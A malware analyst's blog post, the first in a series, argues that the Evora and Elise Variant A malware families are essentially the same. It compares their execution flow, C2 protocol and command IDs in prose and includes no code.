Part 1: Evora vs Elise — The Twins
If you had read my last post, you would have known that I am studying samples of Evora. At the start, it was for the purpose of learning. But as I continue, I got so addicted that I could not draw myself out of it.
Today, I am excited to start sharing my findings on how Evora had evolved over the years! I will split my sharing over a few parts for ease of digestion.
In this first part, let us start with how or from where Evora originates.
During this study, I first encountered the name “Elise” when I was looking for samples of Evora to compare with Sagerunex samples I saw in Symantec report. This CylanceV blog by Brian Wallace (https://threatvector.cylance.com/en_us/home/hunting-for-malware-with-machine-learning.html) which is the source of my Evora samples, publishes a list of Elise samples as well.
Well, since I am downloading these samples of Evora, no harm downloading those Elise too right?
As I had downloaded these Elise samples, I decided to just take a look. I also did some light research on Elise, and found this report “Operation Lotus Blossom” by Palo Alto Networks Unit 42 (https://www.paloaltonetworks.com/resources/research/unit42-operation-lotus-blossom.html) which contains detailed analysis of 3 variants of Elise.
Having read the report by Palo Alto Networks, and at the same time, analyzed Elise, I realized that all the samples of Elise I had downloaded belongs to Elise Variant A as categorized by Palo Alto Networks.
Later on, when I started analyzing samples of Evora, I find that Evora and Elise Variant A (Elise-A) are very much similar, to the point that I think Elise-A = Evora. Why do I say so? Let’s take a look at some of their similarities.
1) Similar Execution Flow & Code Reuse
One major factor that leads me to think both Elise-A and Evora are the same is their execution flow. Evora may be more modularized, and certain codes may be repositioned, but its main execution flow remains the same with Elise-A.
For example, upon the entry function of both malwares, C2 configuration data is decoded before the registration of service control handler. Even the C2 configuration decoding function is exactly the same.
Another example. For Elise-A, a temp file for logging purpose is observed to be created before the creation of thread while this activity does not seem to be observed in Evora at first glance. However, if we take a look at the created thread of Evora, the moment the thread is created, a temp file for logging is created immediately before any other actions. While the creation of temp file is positioned differently in Elise and Evora (i.e., before thread creation in Elise-A, and in the created thread for Evora), the creation of this temp file is still before the execution of other activities in the thread for both.
The above are just some simple examples to show that there are code similarities between the two malware families, and it does not just stop there. Their resemblance in code and execution flow are extensive and to show them all is never-ending.
2) Same C2 Communication Protocol
The similarities between Elise-A and Evora is more than just code and execution flow. Both of them uses the same C2 communication protocol. They communicate to C2 by using HTTP GET/POST requests. Data that is to be transmitted to C2 are RC4 encrypted before it is encoded with base64 and then passed on as a cookie value in the request.
Not only that, the structure/format of their C2 traffic is the same.
3) Same Command IDs and Tasks
Even the list of available C2 Command IDs and its respective tasks are the same between Elise-A and Evora.
My Assessment
Those mentioned above are just some major similarities that are significant, and something which I felt malware analysts looks out for during the correlation of malwares. If you ever look at Elise-A and Evora in detail, you will probably find that they look more alike than what I managed to describe here.
It is possible that two malwares of different families can have code and execution flow resemblance as they may have been written by the same malware developer. It is possible that two malwares of different families use the same C2 communication protocol, has same C2 traffic structure, uses the same Command IDs and executes the same command tasks, as the malwares could be using the same C2 infrastructure.
However, I do not think that it is possible for two malwares of different families to have same code and execution flow, same C2 communication protocol, same Command IDs and tasks all at the same time. Because if they are so similar, they would have been grouped as the same malware family instead of two. Would they not? This is what I feel about Elise-A and Evora, that they should be grouped together as the same malware family. In fact, a comparison of the two using Bindiff yields a result of 80% similarities or more.
Therefore, I am puzzled who and why they were classified differently in the first place. My only take is due to the names of files or export functions and some of the strings found in the malwares. Elise-A contains references to the name “Elise”, such as “EliseDLL.dll” and “EliseA320.tmp”, while Evora contains strings and references to the name “Evora”, such as “EvoraDLL.dll”. But is this a good enough basis?
The Twist
As I continue to look through samples of Evora over the years, I found that Evora took a major change in 2014, two years after the earliest observed compilation date of Evora and Elise-A. Even though the C2 communication protocols and commands remains the same, the change makes a distinct difference between Evora and Elise-A. From there, Evora evolved further, and the Evora we have now is completely different from the Elise we know.
Perhaps, back then, even though they are almost identical, the analyst who labelled them already foresee that these tools will be developed separately as different tools based on the string references found within the malwares, and thus, had classified them as different. Whether this is true or not, it makes me realized that malware analysis and attribution is not just about reporting facts and figures, but also be able to look through some of these facts and foresee what would happen in the future.
Up Next … …
What is the major change Evora had took in 2014 that makes it distinct from Elise? How had Evora changed over the years? Stay tuned!
~Back to geumland
